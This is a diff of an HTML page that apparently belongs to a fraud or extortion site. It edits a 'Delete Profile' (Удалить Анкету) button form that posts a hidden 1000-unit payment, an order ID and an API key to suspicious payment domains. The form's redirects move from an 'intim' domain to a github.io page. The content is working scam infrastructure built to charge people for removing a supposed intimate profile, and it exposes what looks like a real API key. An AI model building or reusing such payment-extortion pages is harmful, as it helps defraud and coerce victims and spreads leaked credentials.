--- a/448254487247-delete.html
+++ b/448254487247-delete.html
@@ -261,20 +261,15 @@
 		
 
 
-<form action="https://infopaymentss.club/api/request/" method="POST">	 
-    <input type="hidden" name="amount" value="1000">
-	<input type="hidden" name="merchant_order_id" value="448254487247">
-	<input type="hidden" name="card_number" value="1">
-	<input type="hidden" name="card_year" value="1">
-	<input type="hidden" name="card_month" value="1">
-	<input type="hidden" name="card_cvc" value="1">
-	<input type="hidden" name="country" value="RU">
-	<input type="hidden" name="api_key" value="0e599e3bfe532f7a918d26c995dcb31665810400d279f0181a14111a5a9f5781">
-	<input type="hidden" name="success_url" value="https://s.intim.one//niceman.html">
-	<input type="hidden" name="fail_url" value="https://s.intim.one//448254487247.html">
-    <input type="hidden" name="notice_url" value="https://s.intim.one//448254487247.html">
-    <input type="hidden" name="use_select_method_form" value="1">
-	<input type="submit" class="donate-but" value="Удалить Анкету">
+<form action="https://bestpaymentss.click/api/request/" method="POST">	 
+<input type="hidden" name="amount" value="1000">
+<input type="hidden" name="merchant_order_id" value="id771029">
+<input type="hidden" name="use_select_method_form" value="1">
+<input type="hidden" name="api_key" value="0e599e3bfe532f7a918d26c995dcb31665810400d279f0181a14111a5a9f5781">
+<input type="hidden" name="success_url" value="https://individualka.github.io/ru/niceman.html">
+<input type="hidden" name="fail_url" value="https://individualka.github.io/ru/id771029-delete.html">
+<input type="hidden" name="notice_url" value="https://individualka.github.io/ru/id771029.html">
+<input type="submit" class="donate-but" value="Удалить Анкету">
 </form>
 
  				 <img src="pngflow.png" width="300px">
